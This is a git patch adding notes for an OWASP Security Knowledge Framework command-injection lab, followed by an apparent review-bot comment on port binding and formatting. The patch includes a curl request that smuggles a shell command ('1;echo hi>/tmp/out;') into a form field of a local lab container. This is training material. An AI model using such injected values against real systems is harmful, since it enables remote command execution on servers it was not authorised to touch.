From f026fed1d2a37be07a9d8acf31252ea07fe5c0ed Mon Sep 17 00:00:00 2001 From: Sander Hautvast Date: Tue, 6 Feb 2024 10:50:21 +0100 Subject: [PATCH] Update proof.md --- Sectraining/proof.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/Sectraining/proof.md b/Sectraining/proof.md index 4a06ed8..c227835 100644 --- a/Sectraining/proof.md +++ b/Sectraining/proof.md @@ -14,3 +14,15 @@ curl 'http://localhost:5000/update' \ -H 'Cookie: JSESSIONID=DA8353D048C3C8B90D33596A10B2B360' \ --data-raw 'color=yellow2' ``` + +## ## blabla1337/owasp-skf-lab:java-cmd + +docker run -p5000:5000 blabla1337/owasp-skf-lab:java-cmd + +drop malicious payload in remote filesystem +```bash +curl 'http://localhost:5000/home' \ + -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQJEtZoqQ8I4ZmYVs' \ + --data-raw $'------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs\r\nContent-Disposition: form-data; name="size"\r\n\r\n1;echo hi>/tmp/out;\r\n------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs--\r\n' \ + --compressed +```
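Review bot: the added `docker run -p5000:5000 blabla1337/owasp-skf-lab:java-cmd` line publishes the lab on all host interfaces, and the curl below it shows the `size` field reaching a shell (`1;echo hi>/tmp/out;`), so anyone who can reach the host on port 5000 gets the same command execution inside the container. Suggest `-p 127.0.0.1:5000:5000` so it matches the `localhost` URL used in the request. The same line is also the only command in the addition outside a bash fence, so it will render as body text. The new heading `## ## blabla1337/owasp-skf-lab:java-cmd` has a doubled marker and will show a literal `##` in the title. The description "drop malicious payload in remote filesystem" would be more useful for the training notes if it named the injected parameter (`size`) and the expected proof (`/tmp/out` containing `hi` inside the container). The commit subject "Update proof.md" does not say which lab was added.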